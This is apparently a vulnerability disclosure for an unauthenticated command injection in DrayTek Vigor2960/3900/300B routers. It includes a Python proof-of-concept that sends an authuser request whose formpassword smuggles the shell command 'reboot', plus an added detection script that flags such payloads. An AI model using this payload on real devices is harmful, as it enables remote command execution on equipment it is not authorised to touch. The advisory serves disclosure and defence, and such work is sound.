A command injection vulnerability without authorization was found by us in DrayTek Vigor2960/Vigor3900/Vigor300B (version <=

The vulnerability allows any unauthenticated attacker to execute commands remotely when sms-auth is enabled.

Cause of Vulnerability

The vulnerability is caused by an unsafe and incomplete patch for CVE-2020-14472 (command injection in the authuser action), which fails to escape some shell metacharacters in the formpassword field.

Proof of Vulnerability

Communication with DrayTek Corp.

  • 2021/02/01, the vulnerability was reported to DrayTek Technical Support.
  • 2021/02/05, DrayTek Technical Support fixed the vulnerability and built a beta firmware.


from sys import argv
from base64 import b64encode
import requests

# Form fields of the authuser action. formusername and formpassword are sent
# base64-encoded; the decoded formpassword is the field the advisory says the
# incomplete patch does not fully escape. PHONENUMBER is taken from argv[1].
data = {
    "URL": "",
    "HOST": "",
    "action": "authuser",
    "formusername": b64encode(b"admin").decode(),
    "formpassword": b64encode(b"admin'&&reboot&&echo '").decode(),
    "PHONENUMBER": argv[1]
}
header = {
    "Content-Type": "application/raw"
}
# The device base URL ("root") is left empty in the original gist.
url = {
    "root": "",
    "cgi": {
        "root": "/cgi-bin",
        "uri": {
            "mf": "/mainfunction.cgi",
        }
    }
}

def build_url(p1, p2=None):
    # Join base URL, CGI directory and the named URI, e.g. /cgi-bin/mainfunction.cgi
    if p2:
        return url["root"] + url[p1]["root"] + url[p1]["uri"][p2]
    return url["root"] + url[p1]

session = requests.session()
session.post(build_url("cgi", "mf"), data=data, headers=header)
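As an added example, not part of the original advisory or the PoC above: a defender-side check for the authuser request pattern described in the Cause of Vulnerability section. It base64-decodes the formusername/formpassword fields of a POST to /cgi-bin/mainfunction.cgi and flags shell metacharacters, which a legitimate credential should never contain. The sample request bodies and the metacharacter set are constructed here and are assumptions, not taken from the firmware.

```python
import base64
import re
from typing import Optional
from urllib.parse import parse_qs, urlencode

# Characters with meaning to a POSIX shell (assumed set, not from the firmware).
# A decoded credential containing any of these is the condition the advisory
# describes: the patch escapes only some of them before the value reaches a shell.
SHELL_META = re.compile(r"[;&|`$'\"\\(){}<>\n\r]")

def decode_field(value: str) -> Optional[str]:
    """Base64-decode one form field; return None if it is not valid base64."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except (ValueError, UnicodeDecodeError):
        return None

def inspect_authuser_body(body: str) -> dict:
    """Return the action and, for authuser requests, the fields that look unsafe."""
    params = parse_qs(body, keep_blank_values=True)
    findings = {"action": params.get("action", [""])[0], "suspicious": {}}
    if findings["action"] != "authuser":
        return findings          # only the authuser action is affected
    for field in ("formusername", "formpassword"):
        decoded = decode_field(params.get(field, [""])[0])
        if decoded is None:
            findings["suspicious"][field] = "not base64"
        elif SHELL_META.search(decoded):
            findings["suspicious"][field] = decoded
    return findings

def is_injection_attempt(body: str) -> bool:
    """True when an authuser POST carries shell metacharacters in a credential field."""
    return bool(inspect_authuser_body(body)["suspicious"])

def b64(raw: bytes) -> str:
    return base64.b64encode(raw).decode()

# Constructed sample bodies: a benign login and one carrying the advisory's payload.
BENIGN = urlencode({"action": "authuser", "formusername": b64(b"admin"),
                    "formpassword": b64(b"S3cure-pass"), "PHONENUMBER": "0000"})
SUSPECT = urlencode({"action": "authuser", "formusername": b64(b"admin"),
                     "formpassword": b64(b"admin'&&reboot&&echo '"), "PHONENUMBER": "0000"})

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, inspect_authuser_body(body))
```

The same check can be applied to request bodies captured by a reverse proxy or WAF in front of the router's management interface.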


C0ss4ck @ ByteDance WuHengLab

H4lo @ DbappSecurity Hatlab

git link: https://gist.github.com/Cossack9989/4fc889b05fa23478ef6ce8ff67200085